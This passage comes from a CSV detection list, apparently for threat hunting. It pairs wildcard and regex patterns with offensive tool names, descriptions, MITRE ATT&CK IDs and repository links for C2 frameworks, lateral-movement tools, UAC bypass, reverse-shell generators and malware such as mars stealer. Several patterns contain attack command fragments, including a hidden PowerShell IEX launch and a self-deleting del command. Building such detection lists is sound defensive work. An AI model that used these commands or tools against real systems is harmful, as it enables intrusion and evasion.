Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit/index.js*",".{0,1000}cloudsploit\/index\.js.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit/scans*",".{0,1000}cloudsploit\/scans.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*CloudSploitSupplemental*",".{0,1000}CloudSploitSupplemental.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudtrail__csv_injection*",".{0,1000}cloudtrail__csv_injection.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*clr2of8/GatherContacts*",".{0,1000}clr2of8\/GatherContacts.{0,1000}","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. 
One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","178","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z" "*cmars/onionpipe*",".{0,1000}cmars\/onionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*",".{0,1000}cmbndhnoonmghfofefkcccljbkdpamhi_14678\.crx.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*cmd /c * --bypass-uac*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-bypass\-uac.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*cmd /c * --remote-impersonation*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*cmd /c *if exist *.txt echo 
ImHere*",".{0,1000}cmd\s\/c\s.{0,1000}if\sexist\s.{0,1000}\.txt\secho\sImHere.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*cmd /c mklink /d * HarddiskVolumeShadowCopy1*",".{0,1000}cmd\s\/c\smklink\s\/d\s.{0,1000}\sHarddiskVolumeShadowCopy1.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*cmd /c whoami* bypass*",".{0,1000}cmd\s\/c\swhoami.{0,1000}\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*cmd smb *-u*-p*",".{0,1000}cmd\ssmb\s.{0,1000}\-u.{0,1000}\-p.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cmd.cat/chattr*",".{0,1000}cmd\.cat\/chattr.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*cmd.exe /c *echo test > C:\Users\Public\test.txt*",".{0,1000}cmd\.exe\s\/c\s.{0,1000}echo\stest\s\>\sC\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*cmd.exe /c powershell -command ""Get-Service *chopper*",".{0,1000}cmd\.exe\s\/c\spowershell\s\-command\s\""Get\-Service\s.{0,1000}chopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*cmd.exe /c rundll32.exe 
agressor.dll*stealth*",".{0,1000}cmd\.exe\s\/c\srundll32\.exe\sagressor\.dll.{0,1000}stealth.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*cmd.exe /c sc start plumber*",".{0,1000}cmd\.exe\s\/c\ssc\sstart\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*",".{0,1000}cmd\.exe\s\/c\stimeout\s\/t\s5\s\&\sdel\s\/f\s\/q\s.{0,1000}\%s.{0,1000}\s\&\sexit.{0,1000}","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c zoom1.msi*",".{0,1000}cmd\.exe\s\/c\szoom1\.msi.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation 
tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\.bat\s.{0,1000}\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\&.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c /start /min powershell.exe -nop -c*",".{0,1000}cmd\.exe\s\/Q\s\/c\s\/start\s\/min\spowershell\.exe\s\-nop\s\-c.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\_* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*cmd.exe /Q /c dir 1> \\localhost\ADMIN$\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\localhost\\ADMIN\$\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by 
metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\snslookup\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-nop\s\-w\s\-hidden\s\-c.{0,1000}IEX.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 
Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershelll\.exe\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*",".{0,1000}cmd\.exe\s\/Q\s\/c\squser\s1\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c start *stage1.exe 1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sstart\s.{0,1000}stage1\.exe\s1.{0,1000}","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 
T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd/backdoor.go*",".{0,1000}cmd\/backdoor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*cmd/bruteforce.go*",".{0,1000}cmd\/bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*cmd/bruteuser.go*",".{0,1000}cmd\/bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*cmd/kubestroyer*",".{0,1000}cmd\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/localrelay*",".{0,1000}cmd\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/merlinagent/*",".{0,1000}cmd\/merlinagent\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & 
Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*cmd/setuid.go*",".{0,1000}cmd\/setuid\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*cmd/unix/reverse_bash*",".{0,1000}cmd\/unix\/reverse_bash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd/unix/reverse_python*",".{0,1000}cmd\/unix\/reverse_python.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd_executor *",".{0,1000}cmd_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*cmd_powershell.cpp*",".{0,1000}cmd_powershell\.cpp.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom 
Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*cmd_shellcodex64.*",".{0,1000}cmd_shellcodex64\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*cmd_shellcodex86.*",".{0,1000}cmd_shellcodex86\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Cmd-Execute-Assembly.*",".{0,1000}Cmd\-Execute\-Assembly\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cmd-Inline-Execute.*",".{0,1000}Cmd\-Inline\-Execute\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*cmdinspector OFF*",".{0,1000}cmdinspector\sOFF.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*cmdinspector ON*",".{0,1000}cmdinspector\sON.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*CmdLineSpoofer.exe*",".{0,1000}CmdLineSpoofer\.exe.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*CmdLineSpoofer.sln*",".{0,1000}CmdLineSpoofer\.sln.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from 